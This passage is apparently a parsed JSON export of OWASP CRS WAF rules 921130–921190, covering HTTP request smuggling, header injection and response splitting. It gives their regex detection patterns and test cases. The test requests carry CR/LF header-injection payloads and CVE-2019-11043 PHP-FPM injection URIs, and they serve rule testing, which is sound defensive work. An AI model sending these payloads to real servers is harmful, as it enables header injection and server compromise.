"malicious_patterns": [] }, { "description": "HTTP Request Smuggling with not supported HTTP versions such as HTTP/1.2", "test_id": 3, "request": { "method": "GET", "uri": "/?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F1.2", "headers": { "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921130 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F1.2" } ] }, { "description": "HTTP Request Smuggling with not supported HTTP versions such as HTTP/3", "test_id": 4, "request": { "method": "GET", "uri": "/?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F3.2", "headers": { "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921130 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F3.2" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 89, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?:\\bhttp/\\d|<(?:html|meta)\\b)", "actions": [ { "act_name": "id", "lineno": 90, "act_quote": "no_quote", "act_arg": "921130", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 91, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 92, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 93, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 94, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 94, "act_quote": "no_quote", "act_arg": "htmlEntityDecode", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 94, "act_quote": "no_quote", "act_arg": "lowercase", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 95, "act_quote": "quotes", "act_arg": "HTTP Response Splitting Attack", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 96, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 97, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 98, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 99, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 100, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 101, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 102, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 103, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ATTACK", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 104, "act_quote": "quotes", "act_arg": "capec/1000/210/272/220/34", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 105, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 106, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 107, "act_quote": "quotes", "act_arg": "tx.http_violation_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 108, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 89 } }, { "rule_id": "921140", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_HEADERS_NAMES", "part": "", "negated": false }, { "name": "REQUEST_HEADERS", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "[\\n\\r]", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "1", "message": "HTTP Header Injection Attack via headers", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ATTACK", "capec/1000/210/272/220/273" ] }, "test_cases": [ { "description": "HTTP Header Injection Attack via headers", "test_id": 1, "request": { "method": "GET", "uri": "/", "headers": { "Host": "localhost", "SomeHeader": "Headerdata\rInjectedHeader: response_splitting_code", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 921140 ] }, "malicious_patterns": [] }, { "description": "HTTP Header Injection Attack via headers", "test_id": 2, "request": { "method": "GET", "uri": "/", "headers": { "Host": "localhost", "SomeHeader": "Headerdata%0dInjectedHeader: response_splitting_code", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921140 ] }, "malicious_patterns": [] } ], "raw_rule": { "type": "SecRule", "lineno": 124, "variables": [ { "variable": "REQUEST_HEADERS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_HEADERS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "[\\n\\r]", "actions": [ { "act_name": "id", "lineno": 125, "act_quote": "no_quote", "act_arg": "921140", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 126, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 127, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 128, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 129, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 129, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 130, "act_quote": "quotes", "act_arg": "HTTP Header Injection Attack via headers", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 131, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 132, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 133, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 134, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 135, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 136, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 137, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 138, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ATTACK", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 139, "act_quote": "quotes", "act_arg": "capec/1000/210/272/220/273", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 140, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 141, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 142, "act_quote": "quotes", "act_arg": "tx.http_violation_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 143, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 124 } }, { "rule_id": "921150", "has_tests": true, "detection": { "variables": [ { "name": "ARGS_NAMES", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "[\\n\\r]", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "2", "message": "HTTP Header Injection Attack via payload (CR/LF detected)", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ATTACK", "capec/1000/210/272/220/33" ] }, "test_cases": [ { "description": "HTTP Header Injection Attack via payload", "test_id": 1, "request": { "method": "GET", "uri": "/get/script.jsp?variableX=bar&variable2=Y&%0d%0restofdata", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921150 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "variableX=bar&variable2=Y&%0d%0restofdata" } ] }, { "description": "Status Page Test - Header Injection Attack (CR/LF detected): Send a parameter name that includes %0d%0a (percent-encoded CR-LF)", "test_id": 2, "request": { "method": "GET", "uri": "/get?parameter%0d%0a=test", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "*/*" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921150 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "parameter%0d%0a=test" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 153, "variables": [ { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "[\\n\\r]", "actions": [ { "act_name": "id", "lineno": 154, "act_quote": "no_quote", "act_arg": "921150", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 155, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 156, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 157, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 158, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 159, "act_quote": "quotes", "act_arg": "HTTP Header Injection Attack via payload (CR/LF detected)", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 160, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 161, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 162, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 163, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 164, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 165, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 166, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 167, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ATTACK", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 168, "act_quote": "quotes", "act_arg": "capec/1000/210/272/220/33", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 169, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 170, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 171, "act_quote": "quotes", "act_arg": "tx.http_violation_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 172, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 153 } }, { "rule_id": "921160", "has_tests": true, "detection": { "variables": [ { "name": "ARGS_GET_NAMES", "part": "", "negated": false }, { "name": "ARGS_GET", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "[\\n\\r]+(?:\\s|location|refresh|(?:set-)?cookie|(?:x-)?(?:forwarded-(?:for|host|server)|host|via|remote-ip|remote-addr|originating-IP))\\s*:", "negated": false } }, "transformations": [ "none", "lowercase" ], "metadata": { "phase": "1", "message": "HTTP Header Injection Attack via payload (CR/LF and header-name detected)", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ATTACK", "capec/1000/210/272/220/33" ] }, "test_cases": [ { "description": "HTTP Header Injection Attack via payload: w/header, invalid line break, newlines after key", "test_id": 1, "request": { "method": "GET", "uri": "/script_rule921160.jsp?variableX=bar&variable2=Y&%0d%0Remote-addr%0d%0d%0d:%20foo.bar.com", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921160 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "variableX=bar&variable2=Y&%0d%0Remote-addr%0d%0d%0d:%20foo.bar.com" } ] }, { "description": "HTTP Header Injection Attack via payload: w/header, correct line break, newlines after key", "test_id": 2, "request": { "method": "GET", "uri": "/script_rule921160.jsp?variableX=bar&variable2=Y&%0d%0aRemote-addr%0d%0d%0d:%20foo.bar.com", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921160 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "variableX=bar&variable2=Y&%0d%0aRemote-addr%0d%0d%0d:%20foo.bar.com" } ] }, { "description": "HTTP Header Injection Attack via payload: w/header", "test_id": 3, "request": { "method": "GET", "uri": "/script_rule921160.jsp?variableX=bar&variable2=Y&%0d%0aRemote-addr:%20foo.bar.com", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921160 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "variableX=bar&variable2=Y&%0d%0aRemote-addr:%20foo.bar.com" } ] }, { "description": "HTTP Header Injection Attack via payload: w/header, attack explicitly in value rather than key", "test_id": 4, "request": { "method": "GET", "uri": "/script_rule921160.jsp?variableX=bar&variable2=%0d%0aRemote-addr:%20foo.bar.com", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921160 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "variableX=bar&variable2=%0d%0aRemote-addr:%20foo.bar.com" } ] }, { "description": "HTTP Header Injection Attack via payload: w/header, attack explicitly in key rather than value", "test_id": 5, "request": { "method": "GET", "uri": "/script_rule921160.jsp?variableX=bar&%0d%0aRemote-addr:%20foo.bar.com=Y", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921160 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "variableX=bar&%0d%0aRemote-addr:%20foo.bar.com=Y" } ] }, { "description": "Status Page Test - simple HTTP header Injection Attack via payload in value", "test_id": 6, "request": { "method": "GET", "uri": "/get?foo=%0d%0arefresh:%20www.bar.com", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921160 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "foo=%0d%0arefresh:%20www.bar.com" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 175, "variables": [ { "variable": "ARGS_GET_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_GET", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "[\\n\\r]+(?:\\s|location|refresh|(?:set-)?cookie|(?:x-)?(?:forwarded-(?:for|host|server)|host|via|remote-ip|remote-addr|originating-IP))\\s*:", "actions": [ { "act_name": "id", "lineno": 176, "act_quote": "no_quote", "act_arg": "921160", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 177, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 178, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 179, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 180, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 180, "act_quote": "no_quote", "act_arg": "lowercase", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 181, "act_quote": "quotes", "act_arg": "HTTP Header Injection Attack via payload (CR/LF and header-name detected)", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 182, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 183, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 184, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 185, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 186, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 187, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 188, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 189, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ATTACK", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 190, "act_quote": "quotes", "act_arg": "capec/1000/210/272/220/33", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 191, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 192, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 193, "act_quote": "quotes", "act_arg": "tx.http_violation_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 194, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 175 } }, { "rule_id": "921190", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_FILENAME", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "[\\n\\r]", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "1", "message": "HTTP Splitting (CR/LF in request filename detected)", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ATTACK", "capec/1000/210/272/220/34" ] }, "test_cases": [ { "description": "New line char in request filename (1)", "test_id": 1, "request": { "method": null, "uri": "/foo%0Abar", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921190 ] }, "malicious_patterns": [] }, { "description": "New line char in request filename (2)", "test_id": 2, "request": { "method": null, "uri": "/foo%0abar", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921190 ] }, "malicious_patterns": [] }, { "description": "FastCGI variable injection: Nginx + PHP-FPM (CVE-2019-11043)", "test_id": 3, "request": { "method": null, "uri": "/index.php/PHP%0Ainfo.php?QQQ", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921190 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "QQQ" } ] }, { "description": "PHP Settings injection: Nginx + PHP-FPM (CVE-2019-11043)", "test_id": 4, "request": { "method": null, "uri": "/index.php/PHP_VALUE%0Asession.auto_start=1;;;?QQQ", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921190 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "QQQ" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 203, "variables": [ { "variable": "REQUEST_FILENAME", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "[\\n\\r]", "actions": [ { "act_name": "id", "lineno": 204, "act_quote": "no_quote", "act_arg": "921190", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 205, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 206, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 207, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 207, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 208, "act_quote": "quotes", "act_arg": "HTTP Splitting (CR/LF in request filename detected)", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 209, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 210, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 211, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 212, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 213, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 214, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 215, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 216, "act_quote": "quotes", 